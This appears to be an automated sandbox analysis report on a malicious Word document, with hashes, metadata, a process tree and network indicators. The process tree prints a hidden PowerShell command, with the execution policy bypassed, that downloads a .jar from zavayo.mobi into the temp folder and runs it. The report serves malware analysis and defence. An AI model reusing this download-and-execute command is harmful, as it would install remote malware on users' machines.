File name: | a6051488868fe29523765f75c59f0819d47f4a825e5ced0b215c17d0d3205b13.docx |
Full analysis: | https://app.any.run/tasks/a0656427-4c36-418c-bffa-3090fe4e8a28 |
Verdict: | Malicious activity |
Analysis date: | July 17, 2019, 09:34:21 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 126110DF5BF005FC55BFF373AD48E6B9 |
SHA1: | 8C2530F320554F60D4DDD251841D34107C79E25A |
SHA256: | A6051488868FE29523765F75C59F0819D47F4A825E5CED0B215C17D0D3205B13 |
SSDEEP: | 768:5xH8ijLe6Oi5MpKMD0ylMkBlwCfugps5okZWV/:X8C2WyukDSFi |
.docx | | | Word Microsoft Office Open XML Format document (52.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (38.8) |
.zip | | | ZIP compressed archive (8.8) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0006 |
ZipCompression: | Deflated |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCRC: | 0x1a34d400 |
ZipCompressedSize: | 398 |
ZipUncompressedSize: | 1510 |
ZipFileName: | [Content_Types].xml |
Template: | Normal.dotm |
---|---|
TotalEditTime: | - |
Pages: | 1 |
Words: | 3 |
Characters: | 22 |
Application: | Microsoft Office Word |
DocSecurity: | None |
Lines: | 1 |
Paragraphs: | 1 |
ScaleCrop: | No |
Company: | TESTER |
LinksUpToDate: | No |
CharactersWithSpaces: | 24 |
SharedDoc: | No |
HyperlinksChanged: | No |
AppVersion: | 12 |
Keywords: | - |
LastModifiedBy: | TESTER |
RevisionNumber: | 2 |
CreateDate: | 2018:12:26 06:56:00Z |
ModifyDate: | 2018:12:26 06:56:00Z |
Title: | - |
---|---|
Subject: | - |
Creator: | TESTER |
Description: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2884 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\a6051488868fe29523765f75c59f0819d47f4a825e5ced0b215c17d0d3205b13.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2752 | "C:\Windows\system32\verclsid.exe" /S /C {00020820-0000-0000-C000-000000000046} /I {00000112-0000-0000-C000-000000000046} /X 0x5 | C:\Windows\system32\verclsid.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Extension CLSID Verification Host Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3896 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2536 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3508 | CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://zavayo.mobi\" ,\" %temp%\\Mif8V1.jar\") }" & %temp%\\Mif8V1.jar | C:\Windows\system32\CMD.EXE | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
4016 | powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://zavayo.mobi\" ,\" C:\Users\admin\AppData\Local\Temp\\Mif8V1.jar\") }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CMD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRB9AB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59E03281.png | — | |
MD5:— | SHA256:— | |||
3896 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRFE45.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2536 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR376.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4016 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TP23MNRPL7C86OORJDTJ.temp | — | |
MD5:— | SHA256:— | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$051488868fe29523765f75c59f0819d47f4a825e5ced0b215c17d0d3205b13.docx | pgc | |
MD5:4721C7174019CC4233859FCAA7314C1B | SHA256:A7D9A129EB1A4AA8B50CE2CC9ED7C2081C613CBC4AB4DB875D4FA99658CBC6A1 | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\1144.xls | text | |
MD5:4880168319FC3578BF92A90D9CED1089 | SHA256:7A6F2ED7A3BF9832A134E1DCD1532D7B612D787118180E3AE44906BC2D6BDE03 | |||
4016 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:47388A8B771AD359484FBDBC4C2AF508 | SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:9B4924A0B2D127F785DF943EB392383B | SHA256:956FE20F31605A99DECE959F1B8C679BD7A7EAAB6569625A0F2E50CE52EB7823 | |||
4016 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1826ec.TMP | binary | |
MD5:47388A8B771AD359484FBDBC4C2AF508 | SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4016 | powershell.exe | GET | — | 23.254.225.209:80 | http://zavayo.mobi/ | US | — | — | unknown |
4016 | powershell.exe | GET | — | 23.254.225.209:80 | http://zavayo.mobi/ | US | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4016 | powershell.exe | 23.254.225.209:80 | zavayo.mobi | Hostwinds LLC. | US | unknown |
Domain | IP | Reputation |
---|---|---|
zavayo.mobi |
| unknown |